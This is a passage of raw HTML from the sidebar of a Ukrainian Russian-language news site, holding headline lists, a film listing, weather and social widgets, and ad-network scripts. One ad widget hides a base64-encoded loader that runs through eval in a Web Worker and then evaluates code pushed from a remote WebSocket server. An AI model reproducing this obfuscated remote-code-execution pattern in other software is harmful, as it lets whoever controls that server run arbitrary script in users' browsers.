class="view last"><span><i></i>2459</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news-finance/full/306-ukraina-dolzhna-nauchitsya-samostoyatelno-razvivatsya-bez-vneshnego-donorstva-egor-kiyan" rel="bookmark">Егор Киян рассказал о возможных последствиях объявления Украиной дефолта</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news-finance/full/1705-egor-kiyan-investicii-yavlyayutsya-odnim-iz-drajverov-ukrainskoj-ekonomiki" rel="bookmark">Егор Киян: Инвестиции являются одним из драйверов украинской экономики</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_economy/full/1204-v-2019-godu-padeniya-ekonomiki-ukrainy-ne-ozhidaetsya-egor-kiyan" rel="bookmark">В 2019 году падения экономики Украины не ожидается , - Егор Киян</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news-markets/full/2702-snizhenie-tarifov-na-gaz-dlya-predpriyatij-mozhet-privesti-k-uvelicheniyu-zarplat-egor-kiyan" rel="bookmark">Снижение тарифов на газ для предприятий может привести к оживлению экономики, - Егор Киян</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_economy/full/2201-otkryvaya-rynki-my-dolzhny-parallelno-chto-to-u-sebya-razvivat-dlya-togo-chtoby-bylo-chto-predlozhit-egor-kiyan" rel="bookmark">Открывая рынки мы должны параллельно что-то у себя развивать для того, чтобы было что предложить, - Егор Киян</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/712-vvedenie-voennogo-polozheniya-budet-posylat-investoram-i-mezhdunarodnym-organizaciyam-opredelennye-zvonochki-egor-kiyan" rel="bookmark">Введение военного положения будет посылать инвесторам и международным организациям определенные "звоночки", - Егор Киян</a><br /></td> </tr><tr></tr></table></div> <div id="M417238ScriptRootC689974"><div id="M417238PreloadC689974"> Загрузка... </div></div><script> (function () { var script = document.createElement('script');script.src = "//jsc.idealmedia.io/e/n/enovosty.com.689974.js?t=" + ((d = new Date()) ? '' + d.getYear() + d.getMonth() + d.getUTCDate() + d.getUTCHours() : '');
script.async = true; document.body.appendChild(script); })();</script> <script>jQuery(document).ready(function($){function region(){html = $('#lastafishasingle .anythingWindow .activePage .region').html();$('#lastafishasingle .head span').html(html);}$('#sliderafishasingle').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><style>#sliderafishasingle .tact li{float:left;width:220px;line-height:8px}#lastafishasingle div.anythingSlider-minimalist-round{margin:auto}#lastafishasingle .postafisha{width:224px}#lastafishasingle h2{text-align:left;padding:10px 32px 10px 35px}#lastafishasingle .title a{display:block;font-size:13px;font-weight:700;text-align:left}#lastafishasingle{margin-bottom:10px;padding:0}#lastafishasingle .title{padding:5px 35px 5px 25px}#lastafishasingle.slide div.anythingSlider-minimalist-round .back,#lastafishasingle.slide div.anythingSlider-minimalist-round .forward{width:40px;height:132px;opacity:1;background-color:transparent}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("img/slider-arrows1.png") no-repeat;width:20px;height:45px;margin-top:54px;margin-left:10px}#lastafishasingle{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha5.png") repeat;border:1px solid #daa36b;-moz-background-size:100%; -webkit-background-size:100%; -o-background-size:100%; background-size:100%}#lastafishasingle .anythingSlider{border-bottom:1px solid #a99168}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha_arrows3.png") no-repeat}#lastafishasingle.slide div.anythingSlider-minimalist-round .forward a{background-position:right 0;margin-left:18px}#lastafishasingle .allafisha{display:block;text-align:right;font-size:14px;font-weight:bold;margin:0;padding:6px 10px 6px}#lastafishasingle .postafisha{position:relative}#lastafishasingle h2 span{float:right;font-size:11px;line-height:18px}#lastafishasingle .region{font-size:13px;text-align:left;padding:0 25px 5px}#lastafishasingle.slide.ssingle h2{padding:10px 17px 3px 40px;font-size:17px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .back,#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward{width:27px;right:-5px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .arrow a{margin-left:0px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward a{margin-left:7px}#lastafishasingle.slide.ssingle .postafisha{width:220px;text-align:right}#lastafishasingle.slide.ssingle .postafisha .aimg{text-align:center;overflow:visible}#lastafishasingle.slide.ssingle .postafisha .aimg img{overflow:visible;box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-moz-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-webkit-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-ms-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-o-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-khtml-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5)}</style><div id="lastafishasingle" class="slide ssingle"><p class="head">Афиша</p><ul id="sliderafishasingle"><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4765688" class="postafisha"><span class="region">Киев 01&#160;августа</span><div class="aimg"><a href="https://enovosty.com/kino/full/2207-kinopremera-film-koroleva-serdec"><img width="170" height="132" alt="Кинопремьера: фильм «Королева сердец»" src="/wp-content/uploads/2019/07/queen-of-hearts2.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/2207-kinopremera-film-koroleva-serdec">Кинопремьера: фильм «Королева сердец»</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4765693" class="postafisha"><span class="region">Киев 01&#160;августа</span><div class="aimg"><a href="https://enovosty.com/kino/full/2207-kinopremera-film-forsazh-xobbs-i-shou"><img width="170" height="132" alt="Кинопремьера: фильм «Форсаж: Хоббс и Шоу» ..." src="/wp-content/uploads/2019/07/forsazh.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/2207-kinopremera-film-forsazh-xobbs-i-shou">Кинопремьера: фильм «Форсаж: Хоббс и Шоу» ...</a></div></div></li></ul></li></ul></li><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4765701" class="postafisha"><span class="region">Киев 01&#160;августа</span><div class="aimg"><a href="https://enovosty.com/kino/full/2207-kinopremera-film-francuzskij-zhigolo"><img width="170" height="132" alt="Кинопремьера: фильм «Французский жиголо» ..." src="/wp-content/uploads/2019/07/sammer.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/2207-kinopremera-film-francuzskij-zhigolo">Кинопремьера: фильм «Французский жиголо» ...</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4766648" class="postafisha"><span class="region">Киев 08&#160;августа</span><div class="aimg"><a href="https://enovosty.com/kino/full/2907-kinopremera-film-angry-birds-v-kino-2"><img width="170" height="132" alt="Кинопремьера: фильм «Angry Birds в кино ..." src="/wp-content/uploads/2019/07/angry.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/2907-kinopremera-film-angry-birds-v-kino-2">Кинопремьера: фильм «Angry Birds в кино ...</a></div></div></li></ul></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4357603"><a href="https://enovosty.com/armiya/full/354-boevaya-bronirovannaya-mashina-dozor-b" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/05/BroneAvto_Dozor-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/05/BroneAvto_Dozor-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/05/BroneAvto_Dozor-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/05/BroneAvto_Dozor.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/354-boevaya-bronirovannaya-mashina-dozor-b" >Боевая бронированная машина «Дозор-Б»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4364925"><a href="https://enovosty.com/armiya/full/484-bespilotnyj-letatelnyj-apparat-supervisor-sm-2" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/06/osm2-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/06/osm2-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/06/osm2-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/06/osm2.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/484-bespilotnyj-letatelnyj-apparat-supervisor-sm-2" >Беспилотный летательный аппарат «Supervisor SM2»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4382064"><a href="https://enovosty.com/armiya/full/852-samohodnaya-gaubica-155-mm-m109-ssha" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/08/m109-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/08/m109-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/08/m109-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/08/m109.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/852-samohodnaya-gaubica-155-mm-m109-ssha" >Самоходная гаубица 155-мм М109 (США)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4458420"><a href="https://enovosty.com/armiya/full/813-reaktivnaya-sistema-zalpovogo-ognya-type-75-yaponiya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/07/Type_75_RSZO-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/07/Type_75_RSZO-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/07/Type_75_RSZO-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/07/Type_75_RSZO.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/813-reaktivnaya-sistema-zalpovogo-ognya-type-75-yaponiya" >Реактивная система залпового огня Type 75 (Япония)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости экономики</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4249,30426', 4249, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4249,30426', 4249, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4249,30426', 4249, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_economy/full/2807-pereraschet-pensij-v-ukraine-komu-i-naskolko-povysyat-vyplaty">Перерасчет пенсий в Украине: кому и насколько повысят выплаты (2296)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2607-ischeznut-duxi-i-krema-ukrainskuyu-kosmetiku-zhdet-revolyuciya">Исчезнут духи и кремы: Украинскую косметику ждет революция (2066)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2507-ekspert-ukazal-na-xitryj-plan-gazproma-ugrozhayushhij-energeticheskoj-katastrofoj-i-nazval-opasnoe-vremya">Эксперт указал на хитрый план "Газпрома", угрожающий энергетической катастрофой и назвал опасное время (1915)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2907-ukraincy-skupayut-nedvizhimost-v-polshe">Украинцы скупают недвижимость в Польше (1794)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2407-pravitelstvo-prigotovila-avtolyubitelyam-nepriyatnyj-syurpriz">Правительство приготовило автолюбителям неприятный сюрприз (1767)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2307-apokalipsis-eshhyo-dazhe-ne-nachinalsya-slanec-ssha-obrushit-plany-opek-i-rossii-na-doroguyu-neft-zloj-odessit">"Апокалипсис ещё даже не начинался": Сланец США обрушит планы ОПЕК и России на дорогую нефть,- "Злой одессит" (1696)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2607-mir-na-poroge-bolshogo-krizisa-kak-cunami-otobrazitsya-na-ukraincax">Мир на пороге большого кризиса. Как цунами отобразится на украинцах (1549)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2907-ne-nuzhno-izobretat-velosiped-ekonomist-rasskazal-kak-izmenit-ekonomiku-ukrainy">"Не нужно изобретать велосипед": Экономист рассказал, как изменить экономику Украины (1436)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2507-okonchanie-gazovogo-kontrakta-s-rf-naftogaz-obratil-vzor-v-storonu-katara">Окончание газового контракта с РФ: "Нафтогаз" обратил взор в сторону Катара (1404)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/2907-eto-vyzyvaet-paniku-istochniki-rasskazali-ob-udare-danii-po-putinskomu-proektu">"Это вызывает панику": Источники рассказали об ударе Дании по путинскому проекту (1201)</a></h3></div> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4301907"><a href="https://enovosty.com/person/full/klichko-vladimir" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/06/klichko_vladimir-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/06/klichko_vladimir-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/06/klichko_vladimir.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/klichko-vladimir" >Владимир<br /> КЛИЧКО</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4312331"><a href="https://enovosty.com/person/full/alekperov-vagit" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/09/alekperov_vagit_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/09/alekperov_vagit_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/09/alekperov_vagit_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/alekperov-vagit" >Вагит<br /> АЛЕКПЕРОВ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4355813"><a href="https://enovosty.com/person/full/781-orobec-lesya" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/05/orobets-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/05/orobets-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/05/orobets.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/781-orobec-lesya" >Леся<br /> ОРОБЕЦ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4655525"><a href="https://enovosty.com/person/full/1911-makron-emmanuel" ><img width="112" height="87" src="https://enovosty.com/wp-content/uploads/2017/11/macron-112x87.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2017/11/macron-112x87.jpg 112w, https://enovosty.com/wp-content/uploads/2017/11/macron.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/1911-makron-emmanuel" >Эммануэль<br /> МАКРОН</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/2907-v-ukraine-sushhestvenno-pomenyayut-pravila-obucheniya-v-universitetax">В Украине существенно поменяют правила обучения в университетах (4477)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2907-v-anneksirovannom-krymu-proizoshlo-novoe-ekologicheskoe-bedstvie">В аннексированном Крыму произошло новое экологическое бедствие (4335)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/2907-sbu-rassekretila-opasnogo-agenta-fsb-rabotavshego-po-dvum-stranam-foto">СБУ рассекретила опасного агента ФСБ, "работавшего" по двум странам (ФОТО) (2665)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/2907-eto-ne-samoubijstvo-poyavilis-vazhnye-podrobnosti-gibeli-tymchuka">"Это не самоубийство": появились важные подробности гибели Тымчука (2242)</a></p><p class="press"><a href="https://enovosty.com/news_incidents/full/2907-na-yuge-afriki-zhestoko-ubili-ukrainskogo-turista">На юге Африки жестоко убили украинского туриста (2113)</a></p><p class="press"><a href="https://enovosty.com/news_incidents/full/2907-v-stolice-v-chastnom-sektore-pytalis-rasstrelyat-sobak-video">В столице в частном секторе пытались расстрелять собак (ВИДЕО) (1994)</a></p><p class="press"><a href="https://enovosty.com/news_kiev/full/2907-v-stolice-na-skandalnom-mostu-vnov-tresnulo-steklo-video">В столице на скандальном мосту вновь треснуло стекло (ВИДЕО) (1958)</a></p><p class="press"><a href="https://enovosty.com/news_economy/full/2907-ukraincy-skupayut-nedvizhimost-v-polshe">Украинцы скупают недвижимость в Польше (1790)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/2907-miroslav-gaj-rasskazal-kakie-territorii-ukrainy-mogut-ujti-v-rossiyu">Мирослав Гай рассказал, какие территории Украины могут уйти в Россию (1498)</a></p><p class="press"><a href="https://enovosty.com/news_economy/full/2907-ne-nuzhno-izobretat-velosiped-ekonomist-rasskazal-kak-izmenit-ekonomiku-ukrainy">"Не нужно изобретать велосипед": Экономист рассказал, как изменить экономику Украины (1434)</a></p></div> </div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><br /></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div id="adriver_banner_C3"></div><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/1104-kak-internet-ploshhadki-zashhishhayut-pokupatelej-i-prodavcov-drug-ot-druga">Как интернет-площадки защищают покупателей и продавцов друг от друга</a></p><p class="press"><a href="https://enovosty.com/publications/full/1704-kak-izmeneniya-v-migracionnoj-programme-kipra-povliyayut-na-investorov-mneniya-ekspertov">Как изменения в миграционной программе Кипра повлияют на инвесторов: мнения экспертов</a></p></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/2602-krax-kremlevskogo-rezhima-process-idet"><img alt="Крах кремлевского режима: процесс идет" src="https://enovosty.com/wp-content/uploads/2019/02/dmitrij-oreshkin-112x78.jpeg"><div></div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/2602-krax-kremlevskogo-rezhima-process-idet">Крах кремлевского режима: процесс идет</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/2602-krax-kremlevskogo-rezhima-process-idet">Вчера я вернулся из Нижнего Новгорода, и там власти марш запретили. На Большой Покровской был одиночный пикет с портретом Бориса, в снегу лежали штук ...</a></span></div></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div id='go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570');});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/novosti-kompanij">Новости компаний</a></div></div> <p class="press"><a href="https://enovosty.com/novosti-kompanij/full/1406-novostrojki-v-brovarax-kvartal-allej-odin-iz-samyx-perspektivnyx-i-masshtabnyx-proektov-vo-vsej-kievskoj-oblasti">Новостройки в Броварах «Квартал Аллей» — один из самых перспективных и масштабных проектов во всей Киевской области</a></p><p class="press"><a href="https://enovosty.com/novosti-kompanij/full/3005-osobennosti-bojlerov-atlantik">Особенности бойлеров Атлантик</a></p><p class="press"><a href="https://enovosty.com/novosti-kompanij/full/2005-kriterii-vybora-xolodilnika">Критерии выбора холодильника</a></p></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36640" type="text/javascript">(function() {var worker36640,tickerID = 36640,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36640'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36640');script.setAttribute('data-idn', idn);script.src = '//v1rt.news/ru-n4p/0/36/ticker_36640.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36640.postMessage(data);}worker36640 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36640.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36640.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><div><a href="https://enovosty.com/markets/full/1507-ne-prodavajte-zemlyu-nashu-mat-vashu-zemelnyj-vopros-isportit-budushhuyu-radu"><img alt="Рынок земли" src="https://enovosty.com/wp-content/themes/eizvestia/img/Zemlya3.gif"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script><br><div><a href="http://www.serdze.org.ua/need-help "><img alt="Нужна помощь" src="https://enovosty.com/wp-content/themes/eizvestia/img/New_svedenie1.gif"></a></div></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://plus.google.com/104224979035578149686" rel="nofollow" target="_blank" class="gplus"><i></i></a></td></tr></table></div><br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-588"></div><script type="text/javascript">new MTr('300-588', {site:907,format:0});</script><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div> <p style="font-size:12.5px;margin-top: 10px;text-align: left;font-weight: 700;font-family: arial,verdana,tahoma;">Новости партнеров</p> <div id="traffim-widget-1017" onclick="trackOutboundLink(this, 'traffim', 'ua.traffim.com');"></div><script>(function() {var useSSL = 'https:' == document.location.protocol;var traffim = document.createElement('script');traffim.type = 'text/javascript'; traffim.async = true;traffim.charset = 'UTF-8';traffim.src = (useSSL ? 'https:' : 'https:') + '//ua.traffim.com/load/1017.js';
var nrvrscr = document.getElementsByTagName('script')[0];nrvrscr.parentNode.insertBefore(traffim, nrvrscr);})();</script><div id="n4p_27280"></div><div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <div class="wiget simple_pr"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
